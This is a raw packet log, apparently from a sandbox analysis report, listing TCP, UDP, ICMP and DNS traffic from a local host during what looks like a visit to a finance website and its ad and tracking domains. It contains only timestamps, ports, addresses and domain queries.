                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.854289055 CET4434999162.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.854406118 CET49991443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.855781078 CET49991443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.855804920 CET4434999162.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.859829903 CET50005443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.859924078 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.860318899 CET50005443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.860472918 CET50005443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.860506058 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.082566023 CET4435000462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.082851887 CET50004443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.082870007 CET4435000462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.084485054 CET4435000462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.085005045 CET50004443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.085289001 CET50004443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.085431099 CET4435000462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.134618044 CET50004443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.284184933 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.284468889 CET50005443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.284534931 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.285033941 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.285521030 CET50005443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.285613060 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.285722971 CET50005443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:34.331360102 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:35.354742050 CET50011443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:35.354806900 CET44350011142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:35.359106064 CET50011443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:35.359409094 CET50011443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:35.359431028 CET44350011142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.061616898 CET44350011142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.062352896 CET50011443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.062385082 CET44350011142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.063517094 CET44350011142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.064814091 CET50011443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.064997911 CET44350011142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.115860939 CET50011443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.305486917 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.425901890 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:37.425966978 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:38.934104919 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:38.934248924 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:38.934319019 CET50005443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:38.935240984 CET50005443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:38.935285091 CET4435000562.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:39.068476915 CET4435000462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:39.068788052 CET4435000462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:39.068972111 CET50004443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:39.069978952 CET50004443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:39.070005894 CET4435000462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:46.748100996 CET44350011142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:46.748168945 CET44350011142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:46.748296976 CET50011443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:48.038574934 CET50011443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:48.038630009 CET44350011142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:30.985229015 CET53568881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:30.985630035 CET53581081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:33.960277081 CET53568091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:35.289243937 CET5465053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:35.289493084 CET5398153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:35.427082062 CET53546501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:35.427484035 CET53539811.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:36.749644041 CET6090953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:36.750906944 CET6529153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:36.935388088 CET53609091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:36.935682058 CET53652911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.463402033 CET5940253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.463632107 CET6332653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.464668989 CET6382853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.464808941 CET5176553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.602514982 CET53517651.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.603410006 CET53594021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.603991032 CET53633261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.680023909 CET53638281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.676126003 CET5125553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.676484108 CET5509453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.813927889 CET53512551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.814263105 CET53550941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:42.127903938 CET6455553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:42.128076077 CET4990753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:42.266273022 CET53645551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:42.269167900 CET53499071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.002984047 CET6047453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.003149033 CET6548153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.164652109 CET53571971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.284080982 CET53506551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.306309938 CET53654811.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.306375027 CET53604741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.907805920 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.101679087 CET5217153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.101835966 CET5093253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.239510059 CET53521711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.242153883 CET53509321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:51.075418949 CET53605471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:51.160758018 CET53652531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.243290901 CET5300553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.243495941 CET5074653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.381958961 CET53530051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.382661104 CET53507461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.159971952 CET5850853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.160264015 CET5500353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.299993992 CET53585081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.407221079 CET53550031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.817049980 CET5745553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.817219019 CET5718953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.958632946 CET53574551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:05.052777052 CET53571891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.066183090 CET5891453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.066390991 CET5854753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.075661898 CET5882053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.075853109 CET6115553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.213726997 CET53588201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.214699984 CET53611551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.465539932 CET53585471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.465579033 CET53589141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.707350969 CET5419953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.707712889 CET5830553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.734210968 CET5152353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.734513044 CET5928653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.844108105 CET53541991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.844552994 CET53583051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.871747017 CET53515231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.873437881 CET53592861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.018512964 CET5384053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.018691063 CET6005353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.169600964 CET6228453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.169809103 CET5394053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.170701027 CET5097753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.170914888 CET5375453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.203352928 CET5003553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.203464031 CET6495153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.306566000 CET53622841.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.308024883 CET53537541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.308314085 CET53539401.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.313848019 CET53509771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.340276957 CET53500351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.342745066 CET53649511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.343370914 CET53538401.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.410414934 CET53600531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:09.638499022 CET5216253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:09.638588905 CET5435053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:09.775538921 CET53543501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:09.784017086 CET53521621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.052982092 CET5068853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.053174019 CET5642653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.075331926 CET5998253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.075495005 CET5179553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.088330030 CET6204853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.088516951 CET5383353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.190299988 CET53506881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.190332890 CET53564261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.215621948 CET53517951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.215797901 CET53599821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.225584030 CET53538331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.281476974 CET53579491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.340363026 CET53620481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.623859882 CET5102453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.624042988 CET6083853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.761491060 CET53608381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.762197018 CET53510241.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.765525103 CET5151453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.765887022 CET5372853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.767818928 CET6320653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.768074989 CET5037053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.770945072 CET5541353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.771665096 CET5382053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.908478022 CET53554131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.000456095 CET53538201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.056216002 CET53503701.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.069957972 CET53632061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.372644901 CET53515141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.373660088 CET53537281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.838198900 CET6010253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.838599920 CET5357153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.975826025 CET53535711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.976710081 CET53601021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.058145046 CET5401053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.058239937 CET6228253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.087016106 CET5706953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.087240934 CET5645353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.196278095 CET53622821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.197556019 CET53540101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.226365089 CET53570691.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.230604887 CET53564531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.553973913 CET5410753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.554157972 CET6517353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.563503981 CET6484753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.563647985 CET6500953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.691382885 CET53651731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.692636013 CET53541071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET53648471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.702047110 CET53650091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.219377041 CET6499553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.219546080 CET6428853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.356813908 CET53642881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.356992960 CET53649951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.426758051 CET4937253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.428675890 CET5717053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.433950901 CET5779953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.434258938 CET6367153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.563541889 CET53493721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.566843987 CET53571701.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.571007967 CET53577991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.571501970 CET53636711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.047545910 CET5910253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.047744036 CET6134853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.186774969 CET53613481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.187628984 CET53591021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.348033905 CET6458953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.348299026 CET6421553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.348897934 CET5550653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.349111080 CET6231353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.486402988 CET53555061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.486999035 CET53645891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.487379074 CET53642151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.487591028 CET53623131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.615345001 CET6299453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.615597010 CET5738153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.752463102 CET53573811.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.829144001 CET53629941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.971908092 CET6280353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.972208023 CET5862353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.109898090 CET53586231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.109935045 CET53628031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.772770882 CET53537741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:33.164128065 CET53523091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.407303095 CET192.168.2.41.1.1.1c245(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:05.052869081 CET192.168.2.41.1.1.1c253(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.410490990 CET192.168.2.41.1.1.1c22b(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.000538111 CET192.168.2.41.1.1.1c23f(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:35.289243937 CET192.168.2.41.1.1.10x71efStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:35.289493084 CET192.168.2.41.1.1.10xa2f0Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:36.749644041 CET192.168.2.41.1.1.10x4e3fStandard query (0)alphaarchitect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:36.750906944 CET192.168.2.41.1.1.10x357bStandard query (0)alphaarchitect.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.463402033 CET192.168.2.41.1.1.10x2bf2Standard query (0)hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.463632107 CET192.168.2.41.1.1.10xc61dStandard query (0)hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.464668989 CET192.168.2.41.1.1.10xbe2cStandard query (0)cdn.printfriendly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.464808941 CET192.168.2.41.1.1.10x7e38Standard query (0)cdn.printfriendly.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.676126003 CET192.168.2.41.1.1.10xcab9Standard query (0)alphaarchitect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.676484108 CET192.168.2.41.1.1.10x2bd2Standard query (0)alphaarchitect.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:42.127903938 CET192.168.2.41.1.1.10x8f81Standard query (0)cdn.printfriendly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:42.128076077 CET192.168.2.41.1.1.10xa208Standard query (0)cdn.printfriendly.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.002984047 CET192.168.2.41.1.1.10x91efStandard query (0)a.remarketstats.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.003149033 CET192.168.2.41.1.1.10xd548Standard query (0)a.remarketstats.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.101679087 CET192.168.2.41.1.1.10xf0f6Standard query (0)a.remarketstats.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.101835966 CET192.168.2.41.1.1.10x2faaStandard query (0)a.remarketstats.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.243290901 CET192.168.2.41.1.1.10xdc8Standard query (0)static.ads-twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.243495941 CET192.168.2.41.1.1.10xfb1eStandard query (0)static.ads-twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.159971952 CET192.168.2.41.1.1.10x9e24Standard query (0)www.printfriendly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.160264015 CET192.168.2.41.1.1.10x93cdStandard query (0)www.printfriendly.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.817049980 CET192.168.2.41.1.1.10x23edStandard query (0)static.ads-twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.817219019 CET192.168.2.41.1.1.10x32cbStandard query (0)static.ads-twitter.com65IN (0x0001)false
